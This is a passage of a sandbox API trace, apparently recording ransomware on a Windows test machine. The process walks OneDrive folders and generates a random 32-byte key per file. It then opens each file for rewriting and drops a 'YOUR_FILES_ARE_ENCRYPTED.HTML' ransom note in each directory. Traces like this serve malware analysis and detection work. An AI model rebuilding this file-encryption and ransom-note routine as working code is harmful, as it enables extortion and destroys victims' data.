RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.361] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\autoplaylogo.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.361] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=4668) returned 1 [0113.361] GetProcessHeap () returned 0x600000 [0113.361] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.364] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="DA") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="A2") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="A0") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="38") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="E9") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="D7") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="4A") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="3F") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="1F") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="AC") returned 2 [0113.364] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="AA") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="B3") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="79") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="E3") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="D7") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="2C") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="79") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="1B") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="A4") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="87") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="B6") returned 2 [0113.365] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="7D") returned 2 [0113.365] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="0F") returned 2 [0113.365] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="62") returned 2 [0113.365] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="4A") returned 2 [0113.365] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="12") returned 2 [0113.365] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="69") returned 2 [0113.365] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="21") returned 2 [0113.365] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="FD") returned 2 [0113.365] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="53") returned 2 [0113.365] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="91") returned 2 [0113.365] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="7D") returned 2 [0113.366] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayLogo.png" [0113.366] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.366] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.366] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd30f840f, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd30f840f, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd3b4055a, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x5d8f6, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.gif", cAlternateFileName="AUTOPL~1.GIF")) returned 1 [0113.366] StrStrIW (lpFirst="AutoPlayOptIn.gif", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.366] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif") returned 93 [0113.366] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0113.366] lstrlenW (lpString=".gif") returned 4 [0113.367] PathFindExtensionW (pszPath="AutoPlayOptIn.gif") returned=".gif" [0113.367] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.367] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\autoplayoptin.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0113.370] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=383222) returned 1 [0113.370] GetProcessHeap () returned 0x600000 [0113.370] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0113.371] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="F8") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="C4") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="73") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="4E") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="CE") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="EF") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="E4") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="B8") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="CC") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="EA") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="F2") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="49") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="F1") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="EB") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="FF") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="A2") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="73") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="54") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="AB") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="FB") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0F") returned 2 [0113.371] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="A7") returned 2 [0113.371] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="B4") returned 2 [0113.371] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="1D") returned 2 [0113.371] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="16") returned 2 [0113.371] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="D3") returned 2 [0113.371] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="CC") returned 2 [0113.371] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="B8") returned 2 [0113.371] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="DA") returned 2 [0113.371] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="4A") returned 2 [0113.372] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="C1") returned 2 [0113.372] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="70") returned 2 [0113.372] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.gif" [0113.372] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.372] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0113.372] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3f6c523, ftCreationTime.dwHighDateTime=0x1d70073, ftLastAccessTime.dwLowDateTime=0xd3f6c523, ftLastAccessTime.dwHighDateTime=0x1d70073, ftLastWriteTime.dwLowDateTime=0xd40775fc, ftLastWriteTime.dwHighDateTime=0x1d70073, nFileSizeHigh=0x0, nFileSizeLow=0x27f2, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="AutoPlayOptIn.png", cAlternateFileName="AUTOPL~2.PNG")) returned 1 [0113.372] StrStrIW (lpFirst="AutoPlayOptIn.png", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.372] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png") returned 93 [0113.372] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0113.373] lstrlenW (lpString=".png") returned 4 [0113.373] PathFindExtensionW (pszPath="AutoPlayOptIn.png") returned=".png" [0113.373] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0113.373] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\autoplayoptin.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x330 [0113.374] GetFileSizeEx (in: hFile=0x330, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=10226) returned 1 [0113.375] GetProcessHeap () returned 0x600000 [0113.375] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30a0048 [0113.378] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="46") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="3F") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="4E") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="82") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="B3") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="1D") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="D8") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="81") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="0E") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="A3") returned 2 [0113.378] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="E5") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="1D") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="4F") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="D1") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="4A") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="98") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="77") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="19") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="70") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B1") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="54") returned 2 [0113.380] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="E0") returned 2 [0113.380] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="CA") returned 2 [0113.380] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="6A") returned 2 [0113.380] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="5A") returned 2 [0113.380] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="A0") returned 2 [0113.380] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C8") returned 2 [0113.380] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="31") returned 2 [0113.380] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="98") returned 2 [0113.380] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="3F") returned 2 [0113.380] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="4F") returned 2 [0113.380] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="1C") returned 2 [0113.381] lstrcpyW (in: lpString1=0x30b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\AutoPlayOptIn.png" [0113.381] CreateIoCompletionPort (FileHandle=0x330, ExistingCompletionPort=0x274, CompletionKey=0x30a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0113.381] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30a0048, lpOverlapped=0x30a0048) returned 1 [0113.381] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60ab3475, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x60ab3475, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x60ab3475, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="az-latn-az", cAlternateFileName="AZ-LAT~1")) returned 1 [0113.381] StrStrIW (lpFirst="az-latn-az", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.381] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az") returned 86 [0113.381] GetProcessHeap () returned 0x600000 [0113.381] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.382] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az" [0113.382] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az\\*" [0113.382] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60ab3475, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x60ab3475, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x63c7855a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0113.385] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60ab3475, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x60ab3475, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x63c7855a, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.385] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63c7855a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x63c7855a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x66788e59, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.385] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az\\FileSync.LocalizedResources.dll.mui") returned 122 [0113.385] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.385] lstrlenW (lpString=".mui") returned 4 [0113.385] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.385] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x63c7855a, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x63c7855a, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x66788e59, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x15ac0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0113.385] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0113.385] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 116 [0113.385] GetProcessHeap () returned 0x600000 [0113.385] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0113.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\az-latn-az\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\az-latn-az\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0113.387] WriteFile (in: hFile=0x324, lpBuffer=0x6d47c0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d47c0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0113.388] CloseHandle (hObject=0x324) returned 1 [0113.388] GetProcessHeap () returned 0x600000 [0113.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0113.388] GetProcessHeap () returned 0x600000 [0113.388] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0113.388] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66c4da1e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x66c4da1e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x66c4da1e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f49f6, dwReserved1=0x6f4980, cFileName="be", cAlternateFileName="")) returned 1 [0113.388] StrStrIW (lpFirst="be", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.388] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be") returned 78 [0113.388] GetProcessHeap () returned 0x600000 [0113.388] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30c81a0 [0113.388] lstrcpyW (in: lpString1=0x30c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be" [0113.388] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be\\*" [0113.388] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66c4da1e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x66c4da1e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x676496c0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName=".", cAlternateFileName="")) returned 0x626838 [0113.389] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66c4da1e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x66c4da1e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x676496c0, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="..", cAlternateFileName="")) returned 1 [0113.389] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x676496c0, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x676496c0, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x6836654c, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x154c0, dwReserved0=0x19e010, dwReserved1=0xf38189, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0113.389] StrStrIW (lpFirst="FileSync.LocalizedResources.dll.mui", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0113.389] wnsprintfW (in: pszDest=0x30c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\be\\FileSync.LocalizedResources.dll.mui") returned 114 [0113.389] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0113.389] lstrlenW (lpString=".mui") returned 4 [0113.389] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" 